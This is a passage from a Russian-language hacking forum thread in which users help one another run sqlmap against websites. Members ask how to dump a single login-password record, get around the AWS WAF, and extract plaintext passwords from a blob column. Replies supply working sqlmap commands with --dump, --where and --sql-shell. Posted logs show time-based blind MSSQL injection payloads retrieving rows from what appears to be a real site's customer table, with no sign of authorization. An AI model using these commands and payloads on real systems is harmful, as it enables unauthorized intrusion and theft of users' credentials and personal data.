Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Как правильно построить запрос к базе данных через sqlmap, если мне нужна только одна запись?
    Запрос типа
    Дампит все 100500 строк, но мне нужна одно значения логина-пароля, предположим, из 666 записи и не больше.
    Как её правильно построить?
     
  2. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    --start=666 --stop=667 ну или через --where="email='[email protected]'", --where="id IN (1,3)",что то типо такого
     
    #942 karkajoi, 6 Oct 2019
    Last edited: 6 Oct 2019
    Muracha likes this.
  3. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Я вас категорически приветствую. Вопрос, есть ли возможность настроить мап для автоматического дампа с конца базы, а не с начала. Типа start=1000 stop=1. Приходится дампить построчно, например 900-1000, 800-900, 700-800 etc, что не очень удобно. Возможно где то в settings.py либо скриптах подправить,либо какая то надстройка существует или костылями проставить какие то специфические параметры выборки в where по id при сливе, чтобы считывались данные с конца таблицы, при дампе по порядку мапом.. Подскажите, если кто озадачивался таким вопросом, периодически возникает данная необходимость...
     
  4. Sentureg

    Sentureg New Member

    Joined:
    31 Jul 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Привет, может кто подскажет bypass к aws waf (Amazon)
    Или как можно обойти эту защиту?
     
  5. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
  6. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток. Получил такой результат со сканера:

    This vulnerability affects /kontaktannonser/lista/.
    HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/GET

    /kontaktannonser/lista/ HTTP/1.1
    Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

    Как правильно составить запрос для Sqlmap?
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    тут надо самому сначала разбираться на что ваф срабатывает, а потом тампер писать, что в самом скульмапе, там типичные тамперы
     
    _________________________
    joelblack likes this.
  8. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    Ребят кто как борится с got HTTP error code: 424 (HTTPError: Failed Dependency) ?
     
  9. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.
    Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения
    Что можно сделать?

    ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3

    [21:11:39] [INFO] retrieved:
    [21:11:39] [DEBUG] performed 3 queries in 1.12 seconds
    [21:11:39] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
    [21:11:39] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>51) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
    [21:11:39] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
    [21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>48) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
    [21:11:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
    [21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>9) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
    [21:11:51] [INFO] retrieved:
    [21:11:51] [DEBUG] performed 3 queries in 11.51 seconds
    [21:11:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [21:11:51] [WARNING] unable to retrieve the number of column(s) '[Customer Group]' entries for table 'sb_customersTB' in database 'SB'
    [21:11:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/stickersbanners.com'

    [*] ending @ 21:11:51 /2019-11-02/
     
  10. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    943 пост в этой тебе (предыдущая страница)
     
  11. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Так в том то и дело, что когда используешь where, перестает извлекать. Без where, все подряд без проблем извлекается
     
  12. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    еще такой вопрос, можно ли как то извлечь данные, по критерию: длинна содержимого колонки.
    Допустим мне нужны все строки, где длинна определенной колонки не 7 символов?
     
  13. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    А вы уверены что колонка у вас называется "Customer Group", а не "Customer_Group"? Если точно с пробелом, то попробуйте поставить имя колонки в одинарные кавычки:
    Code:
    ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "'Customer Group' IS NOT NULL" --dump --threads=10 -v 3
     
    Eidolon likes this.
  14. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    <div class="error-page">
    <h1>Oops - It seems the page you are looking for is not here</h1>
    <p>CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;&#039;DLAj29&#039;&#039; order by t.id desc limit 9&#039; at line 4</p>

    не крутится( какой темпер можно заюзать?

    Yii Framework/PDO
     
  15. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    вдруг кому будет полезно.
    тут DBMS is Microsoft SQL Server это сработало.
     
  16. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Попадались мне тоже пробелы в MSSQL( Правда было в имени БД) помогло добавление вместо пробела %20, и мапа начала крутить без проблем. По идее должно для всего работать.
    Code:
    ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C Customer%20Group --where="'Customer%20Group' IS NOT NULL" --dump --threads=10 -v 3
    
    так по пробуй.
     
    #956 karkajoi, 5 Nov 2019
    Last edited: 5 Nov 2019
  17. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    уж не знаю, в чем там дело.
    --where="Customer%20Group=General" - не работает (в любых комбинациях, и да General значения там есть)
    --where="Email LIKE '%@site.com'" - прекрасно работает
     
  18. xCharley88x

    xCharley88x New Member

    Joined:
    6 Nov 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток
    есть проблемма с выводом из базы
    +-------------------+-------------+
    | Column | Type |
    +-------------------+-------------+
    | aPass | blob |

    --hex и --no-cast не подходят,меняется вывод но проблемма не решается
    --binary-fields тоже
    пассы судя по всему в открытом виде не хэш
    есть тут кто может помочь?
    за помощ отблагодарю!
     
  19. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    пробуйте с начало руками, смотрите в чем проблема, может своими запросами получится через --sql-shell, думаю что какой-то косяк с кодировкой что бьет вывод
     
    _________________________
  20. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    blob выводится через --hex так в чем проблема то?